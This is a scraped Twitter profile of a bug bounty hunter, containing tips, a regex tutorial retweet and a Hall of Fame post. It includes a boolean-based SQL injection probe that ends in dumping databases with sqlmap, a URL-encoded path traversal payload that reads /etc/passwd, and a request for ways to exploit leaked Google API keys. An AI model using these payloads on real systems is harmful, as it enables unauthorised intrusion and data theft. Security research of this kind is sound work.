Mohamed Ibrahim(@mOhamedd7w) 's Twitter Profileg
Mohamed Ibrahim

@mOhamedd7w

Security_Researcher/Bug_Bounty_Hunter

ID:1366684643785867273

calendar_today02-03-2021 09:40:12

194 Tweets

1,0K Followers

491 Following

sa||am 🇵🇸(@h0tak88r) 's Twitter Profile Photo

welcomeToMyCyberSecurityCorner !!👀

Here is my notes about cyber security

- API Sec
- Web AppSec
- Mobile AppSec
- Programming
- Network Sec
- BugBountyHunting

Enjoy it, Good By <3

sallam.gitbook.io

account_circle
Mohamed Ibrahim(@mOhamedd7w) 's Twitter Profile Photo

SQLi..
1. original parameter --> content-length:9230
2. inject: and 1=1 # --> content-length:9230
3. inject: and 1=2 # --> content-length:4766
4. Now, sqlmap turn --> Dump the whole databases

tip

SQLi.. 1. original parameter --> content-length:9230 2. inject: and 1=1 # --> content-length:9230 3. inject: and 1=2 # --> content-length:4766 4. Now, sqlmap turn --> Dump the whole databases #bugbountytip #bugbounty #Pentesting
account_circle
Somdev Sangwan(@s0md3v) 's Twitter Profile Photo

Learn regex in 3 minutes ✨

cat matches cat
ca+t matches caaaaaaaaaaaaat but not ct
ca*t matches caaaaaaaaaaaaat and also ct
ca{2,4}t matches caat, caaat and caaaat
c(at)+ matches catatatatatat
c(at|orn) matches cat and corn
c[ea]t matches cat and cet

account_circle
Mohamed Ibrahim(@mOhamedd7w) 's Twitter Profile Photo

LFI On Fire .❤️
found interesting param using gf tool --> send request to Intruder --> using LFI-Jhaddix wordlist -->Got LFI
Payload used: %2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

tips

LFI On Fire .❤️ found interesting param using gf tool --> send request to Intruder --> using LFI-Jhaddix wordlist -->Got LFI Payload used: %2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd #bugbountytips #bugbounty #bugcrowd #hackerone #security
account_circle
Mohamed Ibrahim(@mOhamedd7w) 's Twitter Profile Photo

Hi amazing hackers:
I have found (Client ID) and (API key) and (INCIDENT FOLDER ID) and (INCIDENT TEMPLATE ID) from the Google Developer Console...
Need away for Exploitation ...

account_circle
Jayesh Madnani(@Jayesh25_) 's Twitter Profile Photo

🔒 Question of the day: How to hunt on restricted web applications protected behind a login page? 🤔 Well, guess what? While most folks tend to overlook these targets, I've pocketed over 5 figures $$$$$💰 from such apps. Bounties for findings on these assets often result in…

account_circle
Mohamed Ibrahim(@mOhamedd7w) 's Twitter Profile Photo

SAD Story ..

- Found LFI at 1:00 PM today on (ip:port) ..😍
- I waited till 8:00 PM to send a report
- the port of Ip is closed
- P1 has gone ..😥

SAD Story .. - Found LFI at 1:00 PM today on (ip:port) ..😍 - I waited till 8:00 PM to send a report - the port of Ip is closed - P1 has gone ..😥 #bugbounty #security
account_circle
Mohamed Ibrahim(@mOhamedd7w) 's Twitter Profile Photo

I'm happy to share that I've just made another Hall of Fame, this time from the BBC , and this time it comes with a cool swag
BBC Hall of Fame: bbc.com/backstage/secu…

I'm happy to share that I've just made another Hall of Fame, this time from the @BBC , and this time it comes with a cool swag @BBC Hall of Fame: bbc.com/backstage/secu… #BugBounty #swag
account_circle